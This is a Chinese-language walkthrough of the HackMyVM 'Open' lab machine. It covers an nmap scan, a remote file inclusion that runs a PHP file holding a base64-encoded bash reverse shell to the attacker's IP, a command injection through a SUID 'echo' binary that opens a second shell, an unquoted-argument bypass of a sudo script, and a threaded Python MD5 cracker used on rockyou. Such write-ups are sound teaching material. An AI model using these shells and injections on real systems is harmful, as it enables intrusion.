HackMyVM-Open

靶机IP:192.168.56.130

信息收集

1
2
3
4
5
6
7
8
9
10
11
nmap 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-03 08:23 EDT
Nmap scan report for open.dsz (192.168.56.130)
Host is up (0.00048s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5E:25:AE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

访问80端口提示跳转域名open .dsz , 放到host里。

Getshell

访问得到一个url界面,提示有RFI(远程文件包含)

在攻击机上起个http服务(python3 -m http 80)反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat 1.php 
<?php
echo shell_exec("printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvNDQ0NCAwPiYxKSAm|base64 -d|bash");
?>
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444127.0.0.1192.168.21.128192.168.56.104172.17.0.1172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Open-192.168.56.130-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/Open~192.168.56.130_Linux_x86_64/2025_08_03-06_46_03-181.log 📜

wwwdata能直接读userflag,很良心

GetMiao

惯例看文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@Open:/opt$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/echo

cat了一下这个echo发现存在命令注入点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@Open:/opt$ ./echo "'; printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvOTk5OSAwPiYxKSAm|base64 -d|bash; echo '"
执行命令: echo '[用户输入]: '; printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvOTk5OSAwPiYxKSAm|base64 -d|bash; echo ''
[用户输入]: 

───────────────────────────────────────────────────────────────────────────────
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Open-192.168.56.130-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/Open~192.168.56.130_Linux_x86_64/2025_08_03-07_29_25-362.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────

之后写个公钥方便进去。

Root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
miao@Open:~$ sudo -l
Matching Defaults entries for miao on Open:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User miao may run the following commands on Open:
    (ALL) NOPASSWD: /opt/hello.sh
miao@Open:~$ sudo /opt/hello.sh dsz
miao@Open:~$ cat /opt/hello.sh
PATH=/usr/bin

[ -n "$1" ] || exit 1
[ "$1" = "dsz" ] && exit 2
#[ $1 = "dsz" ] && cat /root/password.txt | md5sum | awk '{print $1}'
[ $1 = "dsz" ] && cat /root/password.txt

echo "Goodbye!"

这里也存在命令注入点,最后的$1没用双引号包裹。

1
2
3
4
sudo /opt/hello.sh "x -o dsz"
6cd1f22e65d26246530ff7a2528144e3
Goodbye!

可以使用这样的逻辑判断绕过,也有更简单的方案直接加个空格就可以。

拿到md5后尝试了很长时间也没有爆破成功,这里回看之前的脚本,发现脚本给出md5的方式是通过cat,所以md5末尾会存在一个换行符。(echo加参数-n输出不带换行符)

用python脚本爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import threading
import hashlib

# 配置参数
DICTIONARY_PATH = 'rockyou.txt'
TARGET_HASH = '6cd1f22e65d26246530ff7a2528144e3'
MAX_THREADS = 1000

# 全局控制变量
found = False
lock = threading.Lock()

def check_password(word_bytes):
    """
    计算 word_bytes + \n 的 MD5,若匹配则打印结果并退出
    """
    global found
    if found:
        return

    # 加上换行符后进行哈希
    candidate = word_bytes.strip() + b'\n'
    md5_hash = hashlib.md5(candidate).hexdigest()

    if md5_hash == TARGET_HASH:
        with lock:
            if not found:
                found = True
                decoded = candidate.decode(errors="ignore").strip()
                print(f"\n[+] 匹配成功!明文为: {decoded}\\n")
                exit()

def start_thread(word):
    if not found:
        check_password(word)

def main():
    global found
    print("[*] 开始爆破...")

    try:
        with open(DICTIONARY_PATH, 'rb') as file:
            lines = file.readlines()
    except FileNotFoundError:
        print(f"[-] 无法打开字典文件: {DICTIONARY_PATH}")
        return

    threads = []

    for word in lines:
        if found:
            break
        while threading.active_count() >= MAX_THREADS:
            pass  # 等待有线程空出
        t = threading.Thread(target=start_thread, args=(word,))
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

    if not found:
        print("\n[-] 未找到匹配项")

if __name__ == "__main__":
    main()

拿到密码登录root。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ssh root@192.168.56.130
root@192.168.56.130's password: 
Linux Open 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 29 00:48:55 2025 from 192.168.3.94
root@Open:~# cat /root/root.txt 
flag{root-6cd1f22e65d26246530ff7a2528144e3}
root@Open:~#

就是挺中规中矩的一个靶机吧,从开始的webshell到user再到root都有种循序渐进的感觉,对命令注入考察的比较多,还有就是要注意细节。

#渗透 #HVM
HackMyVM-Open
http://example.com/2025/08/03/HackMyVM-Open/
Author
Skyarrow
Posted on
August 3, 2025
Licensed under